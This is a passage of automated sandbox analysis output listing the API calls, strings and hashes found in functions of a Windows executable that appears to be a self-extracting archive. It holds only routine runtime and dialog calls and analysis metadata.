                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                    • API String ID: 667068680-1718035505
                                                                                                                    • Opcode ID: a730465fe199812acde61c3089d5bff38bb8ba59a2901ea1f7d00b6b9a5d1466
                                                                                                                    • Instruction ID: 1435362fa95f546f9a47d4c14ee3ef6095c0f4ac7de450353d9ab4f58774a37b
                                                                                                                    • Opcode Fuzzy Hash: a730465fe199812acde61c3089d5bff38bb8ba59a2901ea1f7d00b6b9a5d1466
                                                                                                                    • Instruction Fuzzy Hash: 95F0C2327803629F0F214E767C885A6A2C97B25799B0235FED902F3340EB60CC585B90
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00E5891E
                                                                                                                      • Part of subcall function 00E58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?), ref: 00E58DE2
                                                                                                                      • Part of subcall function 00E58DCC: GetLastError.KERNEL32(?,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?,?), ref: 00E58DF4
                                                                                                                    • _free.LIBCMT ref: 00E58930
                                                                                                                    • _free.LIBCMT ref: 00E58943
                                                                                                                    • _free.LIBCMT ref: 00E58954
                                                                                                                    • _free.LIBCMT ref: 00E58965
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID: p
                                                                                                                    • API String ID: 776569668-2678736219
                                                                                                                    • Opcode ID: ad444a5fa4703c62421b21b4f5902b9bf42ed6c20dd4843ce7db424aeb93daff
                                                                                                                    • Instruction ID: 00d36cee8f51916a7d4e864d147645b7ca7b712a1a8b39a842f63e6c6ace76ed
                                                                                                                    • Opcode Fuzzy Hash: ad444a5fa4703c62421b21b4f5902b9bf42ed6c20dd4843ce7db424aeb93daff
                                                                                                                    • Instruction Fuzzy Hash: 34F01775811226AF8A066F16FE024463BF5B724715300290BFB18723B2DB72494DDB81
                                                                                                                    APIs
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E414C2
                                                                                                                      • Part of subcall function 00E3B146: GetVersionExW.KERNEL32(?), ref: 00E3B16B
                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E414E6
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E41500
                                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00E41513
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E41523
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E41533
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2092733347-0
                                                                                                                    • Opcode ID: 1f0f0a0240ca6dc0df1737741ac589041428bbc3aa916d5deeb193fa3cc117fa
                                                                                                                    • Instruction ID: f966892720d0169b6e31c5fc4b0acabe0e41fbcc8b46cf1139a60abe3b0ca1f7
                                                                                                                    • Opcode Fuzzy Hash: 1f0f0a0240ca6dc0df1737741ac589041428bbc3aa916d5deeb193fa3cc117fa
                                                                                                                    • Instruction Fuzzy Hash: B4310775108305AFC700DFA9D88499BBBF8BF98754F005A1EF999D3210E730D549CBA6
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,00E52AF1,00E502FC,00E4FA34), ref: 00E52B08
                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E52B16
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E52B2F
                                                                                                                    • SetLastError.KERNEL32(00000000,00E52AF1,00E502FC,00E4FA34), ref: 00E52B81
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3852720340-0
                                                                                                                    • Opcode ID: 78022968f9de247f4e590cea935ef94bff657513f9087c281e28ca5cf5408335
                                                                                                                    • Instruction ID: fba5a838627b031444641cd2aebcfd92fb0a9a0cb153e94ed3f560930ecf3668
                                                                                                                    • Opcode Fuzzy Hash: 78022968f9de247f4e590cea935ef94bff657513f9087c281e28ca5cf5408335
                                                                                                                    • Instruction Fuzzy Hash: C401D8361083116DEA652A767C459572BA9EB127FBB602F3EFE10751E0FF516C0C5244
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,00E71030,00E54674,00E71030,?,?,00E53F73,00000050,?,00E71030,00000200), ref: 00E597E9
                                                                                                                    • _free.LIBCMT ref: 00E5981C
                                                                                                                    • _free.LIBCMT ref: 00E59844
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00E71030,00000200), ref: 00E59851
                                                                                                                    • SetLastError.KERNEL32(00000000,?,00E71030,00000200), ref: 00E5985D
                                                                                                                    • _abort.LIBCMT ref: 00E59863
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3160817290-0
                                                                                                                    • Opcode ID: 8e03bd6494d2af7308979fc1ac769f97154765577866b5eeef14fc3252677606
                                                                                                                    • Instruction ID: 09af18838667c46ed0890de105978c08b567532340d84bae18d57b68357ae9da
                                                                                                                    • Opcode Fuzzy Hash: 8e03bd6494d2af7308979fc1ac769f97154765577866b5eeef14fc3252677606
                                                                                                                    • Instruction Fuzzy Hash: FEF02D35100601BAC65933357C0AA9B1AE98FD2777F243934FE14B22D3EF60880D4151
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E4DC47
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E4DC61
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E4DC72
                                                                                                                    • TranslateMessage.USER32(?), ref: 00E4DC7C
                                                                                                                    • DispatchMessageW.USER32(?), ref: 00E4DC86
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E4DC91
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2148572870-0
                                                                                                                    • Opcode ID: b63f12a251f8015e601c1b8ffb85a782afc2fcb685f4ccca7c2bcbc656b7b6a2
                                                                                                                    • Instruction ID: f9a24e96c195be64dcedf29e901e9b5f029644cf4c4d5829a8c4019797c54aa3
                                                                                                                    • Opcode Fuzzy Hash: b63f12a251f8015e601c1b8ffb85a782afc2fcb685f4ccca7c2bcbc656b7b6a2
                                                                                                                    • Instruction Fuzzy Hash: 32F03C72A01219BBCB206BA6EC4DDCBBF7DEF42795F004012F51AF2061D674864AC7A0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E4A699: GetDC.USER32(00000000), ref: 00E4A69D
                                                                                                                      • Part of subcall function 00E4A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E4A6A8
                                                                                                                      • Part of subcall function 00E4A699: ReleaseDC.USER32(00000000,00000000), ref: 00E4A6B3
                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00E4A83C
                                                                                                                      • Part of subcall function 00E4AAC9: GetDC.USER32(00000000), ref: 00E4AAD2
                                                                                                                      • Part of subcall function 00E4AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00E4AB01
                                                                                                                      • Part of subcall function 00E4AAC9: ReleaseDC.USER32(00000000,?), ref: 00E4AB99
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                                    • String ID: "$($A
                                                                                                                    • API String ID: 1061551593-2217482528
                                                                                                                    • Opcode ID: 6da4bf33a70e138e6a7e211138d7e6b135ba8d94fb01d44a3d9e05b004f39e09
                                                                                                                    • Instruction ID: b78be8e792b8fdaa66e092b2932afaf14439f6df8526d6896eef550074583992
                                                                                                                    • Opcode Fuzzy Hash: 6da4bf33a70e138e6a7e211138d7e6b135ba8d94fb01d44a3d9e05b004f39e09
                                                                                                                    • Instruction Fuzzy Hash: 2A91F371204344AFD614DF25E84492BBBF8FFC8750F04591EF59AE3260DB70A905CB62
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E405DA: _wcslen.LIBCMT ref: 00E405E0
                                                                                                                      • Part of subcall function 00E3B92D: _wcsrchr.LIBVCRUNTIME ref: 00E3B944
                                                                                                                    • _wcslen.LIBCMT ref: 00E3C197
                                                                                                                    • _wcslen.LIBCMT ref: 00E3C1DF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                                    • API String ID: 3513545583-31770016
                                                                                                                    • Opcode ID: f329b9ea51dcc42c473b3efb0b8eec052b7dd50249802cb5708e7d280378bc5f
                                                                                                                    • Instruction ID: 0ce3e53b152dc9cf3cd8336baa0660943f67d72a94d137bdb59254d5cb752be1
                                                                                                                    • Opcode Fuzzy Hash: f329b9ea51dcc42c473b3efb0b8eec052b7dd50249802cb5708e7d280378bc5f
                                                                                                                    • Instruction Fuzzy Hash: FF416A2654035195C736AF74984AA7BBBF4EF44748F30390EF9927B082EB60CD81D791
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00E3BB27
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00E3A275,?,?,00000800,?,00E3A23A,?,00E3755C), ref: 00E3BBC5
                                                                                                                    • _wcslen.LIBCMT ref: 00E3BC3B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                                    • String ID: UNC$\\?\
                                                                                                                    • API String ID: 3341907918-253988292
                                                                                                                    • Opcode ID: ae237938659bf9669b88b6f59aaf57c6831fffd8c04afa31510acf90f39f1431
                                                                                                                    • Instruction ID: acfdad8bd1794f32d237206d75816f66cc5e5d977adbbff2d83b472bcb80793d
                                                                                                                    • Opcode Fuzzy Hash: ae237938659bf9669b88b6f59aaf57c6831fffd8c04afa31510acf90f39f1431
                                                                                                                    • Instruction Fuzzy Hash: B541C331440215A6CF31AF60DC4AEEABBE8AF80394F01B565FA56F3151DB74DE90CB60
                                                                                                                    APIs
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E4CD84
                                                                                                                      • Part of subcall function 00E4AF98: _wcschr.LIBVCRUNTIME ref: 00E4B033
                                                                                                                      • Part of subcall function 00E41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E3C116,00000000,.exe,?,?,00000800,?,?,?,00E48E3C), ref: 00E41FD1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr$CompareString
                                                                                                                    • String ID: <$HIDE$MAX$MIN
                                                                                                                    • API String ID: 69343711-3358265660
                                                                                                                    • Opcode ID: 4b3dfca839a757bed1a21e7e00743dc1ea642b06e98f3e89adcedb647ac226df
                                                                                                                    • Instruction ID: 88700766dd1345a1c58bf6b2300aae198a7c9cb8dde83d94f65325bb6d59cf6e
                                                                                                                    • Opcode Fuzzy Hash: 4b3dfca839a757bed1a21e7e00743dc1ea642b06e98f3e89adcedb647ac226df
                                                                                                                    • Instruction Fuzzy Hash: 4031A372A00209AADF25CB60EC41EFE73FCEB15354F505566E901F7180EBB09E848FA1
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00E3B9B8
                                                                                                                      • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E3B9D6
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 00E3B9E6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                    • String ID: %c:\
                                                                                                                    • API String ID: 525462905-3142399695
                                                                                                                    • Opcode ID: 0160d82d91c476cd48b1fd942584e4a5ff6784386b43a80e4869701143c1e0fe
                                                                                                                    • Instruction ID: 6d30bf2220706c4defcdb3afd95d9c271c42d4a1744262c2dac7c5eabb4eabe7
                                                                                                                    • Opcode Fuzzy Hash: 0160d82d91c476cd48b1fd942584e4a5ff6784386b43a80e4869701143c1e0fe
                                                                                                                    • Instruction Fuzzy Hash: A101D6675047117596306B758C4AD6BABDCEE91771F40680AF746F7082EB24D854C2B1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E31316: GetDlgItem.USER32(00000000,00003021), ref: 00E3135A
                                                                                                                      • Part of subcall function 00E31316: SetWindowTextW.USER32(00000000,00E635F4), ref: 00E31370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E4B2BE
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00E4B2D6
                                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00E4B304
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: GETPASSWORD1$xz
                                                                                                                    • API String ID: 445417207-3234807970
                                                                                                                    • Opcode ID: 923393859d2e0242c2b9f855cc8dee460cfc9ba0c155f5f405b9262ef5702ce2
                                                                                                                    • Instruction ID: 8aca8c9e3c30b085b2a25e6d6401a94198b4339704f4f5591d6227b8b055a565
                                                                                                                    • Opcode Fuzzy Hash: 923393859d2e0242c2b9f855cc8dee460cfc9ba0c155f5f405b9262ef5702ce2
                                                                                                                    • Instruction Fuzzy Hash: 74110432940118BADB21AE75AC4DFFF3BBCEF09744F001021FA45B2090C7E0DA059761
                                                                                                                    APIs
                                                                                                                    • LoadBitmapW.USER32(00000065), ref: 00E4B6ED
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00E4B712
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00E4B744
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00E4B767
                                                                                                                      • Part of subcall function 00E4A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E4B73D,00000066), ref: 00E4A6D5
                                                                                                                      • Part of subcall function 00E4A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00E4B73D,00000066), ref: 00E4A6EC
                                                                                                                      • Part of subcall function 00E4A6C2: LoadResource.KERNEL32(00000000,?,?,?,00E4B73D,00000066), ref: 00E4A703
                                                                                                                      • Part of subcall function 00E4A6C2: LockResource.KERNEL32(00000000,?,?,?,00E4B73D,00000066), ref: 00E4A712
                                                                                                                      • Part of subcall function 00E4A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00E4B73D,00000066), ref: 00E4A72D
                                                                                                                      • Part of subcall function 00E4A6C2: GlobalLock.KERNEL32(00000000), ref: 00E4A73E
                                                                                                                      • Part of subcall function 00E4A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E4A762
                                                                                                                      • Part of subcall function 00E4A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E4A7A7
                                                                                                                      • Part of subcall function 00E4A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00E4A7C6
                                                                                                                      • Part of subcall function 00E4A6C2: GlobalFree.KERNEL32(00000000), ref: 00E4A7CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                    • String ID: ]
                                                                                                                    • API String ID: 1797374341-3352871620
                                                                                                                    • Opcode ID: 1c5741a90cfad4255019e416f47a87dce469ab987aa1562b1cc47e6c926184b3
                                                                                                                    • Instruction ID: e68d82e084d9ecc0e55938884a0b9c04b7723dd550bf30680a505aeb04984ddb
                                                                                                                    • Opcode Fuzzy Hash: 1c5741a90cfad4255019e416f47a87dce469ab987aa1562b1cc47e6c926184b3
                                                                                                                    • Instruction Fuzzy Hash: C601F9365402016BC7117775BC0DA7F7AB99FC0766F091223F900B7291DF75CD094261
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E31316: GetDlgItem.USER32(00000000,00003021), ref: 00E3135A
                                                                                                                      • Part of subcall function 00E31316: SetWindowTextW.USER32(00000000,00E635F4), ref: 00E31370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E4D64B
                                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00E4D661
                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00E4D675
                                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 00E4D684
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: RENAMEDLG
                                                                                                                    • API String ID: 445417207-3299779563
                                                                                                                    • Opcode ID: d0076caf2ac13487ee0e56f57243f38dfd6be80b1eabbf6eb4dc5dcf153033b3
                                                                                                                    • Instruction ID: 03fc0a9a6306e238adbeed9da0f0e7110ec8d61c12f4cc18dfd2d3d81322d0a3
                                                                                                                    • Opcode Fuzzy Hash: d0076caf2ac13487ee0e56f57243f38dfd6be80b1eabbf6eb4dc5dcf153033b3
                                                                                                                    • Instruction Fuzzy Hash: E3012833689310BED2114F76BD09F577B6CEB9AB05F120052F305B20D0C6A29A188779
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E57E24,00000000,?,00E57DC4,00000000,00E6C300,0000000C,00E57F1B,00000000,00000002), ref: 00E57E93
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E57EA6
• FreeLibrary.KERNEL32(00000000,?,?,?,00E57E24,00000000,?,00E57DC4,00000000,00E6C300,0000000C,00E57F1B,00000000,00000002), ref: 00E57EC9
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 4b633ae6c553cc38fb85ad828477a159b1255d8681ea777b7f6df4b8e74fcd3c
• Instruction ID: 5c4fa04acb8776d386394f87dccf8d0e03058b28374ef2ec7fbcd8da310cc665
• Opcode Fuzzy Hash: 4b633ae6c553cc38fb85ad828477a159b1255d8681ea777b7f6df4b8e74fcd3c
• Instruction Fuzzy Hash: CEF04431944208BFCB119BA5FC09B9FBFB9EB44796F0041A9F815B2260DF709E58CA90
APIs
  • Part of subcall function 00E4081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E40836
  • Part of subcall function 00E4081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E3F2D8,Crypt32.dll,00000000,00E3F35C,?,?,00E3F33E,?,?,?), ref: 00E40858
• GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E3F2E4
• GetProcAddress.KERNEL32(00E781C8,CryptUnprotectMemory), ref: 00E3F2F4
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AddressProc$DirectoryLibraryLoadSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
• API String ID: 2141747552-1753850145
• Opcode ID: fe5afcd3e0b940fc90819bee661bb45b66c71bb65b1368aa17778982f7a21fd3
• Instruction ID: 7d82500f5a6f16806ca95be2ba24d7d619a836b72ab406f11a55152a115b7a05
• Opcode Fuzzy Hash: fe5afcd3e0b940fc90819bee661bb45b66c71bb65b1368aa17778982f7a21fd3
• Instruction Fuzzy Hash: 81E08670D547429EC7209F75B84DB027ED56F04744F14A86DF0DAB3690DAB4D544CB50
APIs
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: AdjustPointer$_abort
• String ID:
• API String ID: 2252061734-0
• Opcode ID: 5a4ea34952661846a9e34450a613e29b48f53daf17bd8723554f7ce0f23bd360
• Instruction ID: 02edf12102c1a3365c411969138ec00d30ed0bdd6ea1dd98c327f0aa84f0c8bb
• Opcode Fuzzy Hash: 5a4ea34952661846a9e34450a613e29b48f53daf17bd8723554f7ce0f23bd360
• Instruction Fuzzy Hash: CB510472600202AFDB298F14D845BAAB3B4FF52306F245C2DEE05772A2E731ED48D790
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00E5BF39
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E5BF5C
  • Part of subcall function 00E58E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E5CA2C,00000000,?,00E56CBE,?,00000008,?,00E591E0,?,?,?), ref: 00E58E38
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E5BF82
• _free.LIBCMT ref: 00E5BF95
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E5BFA4
Memory Dump Source
• Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e30000_file.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 1360c81e2abee8024d7e2f83167f9112095c5e031f3f770b7238396a62d299b8
• Instruction ID: 74b6854efce80f50f0c6c62ef4fae05c2dddbcdae4e908c1deffdbc2fcaf429d
• Opcode Fuzzy Hash: 1360c81e2abee8024d7e2f83167f9112095c5e031f3f770b7238396a62d299b8
• Instruction Fuzzy Hash: 170184727066157F232116776C4DCBB6A6EDEC3BA63141929FD04F2141EF608D0995B0
APIs
• GetLastError.KERNEL32(?,?,?,00E591AD,00E5B188,?,00E59813,00000001,00000364,?,00E53F73,00000050,?,00E71030,00000200), ref: 00E5986E
• _free.LIBCMT ref: 00E598A3
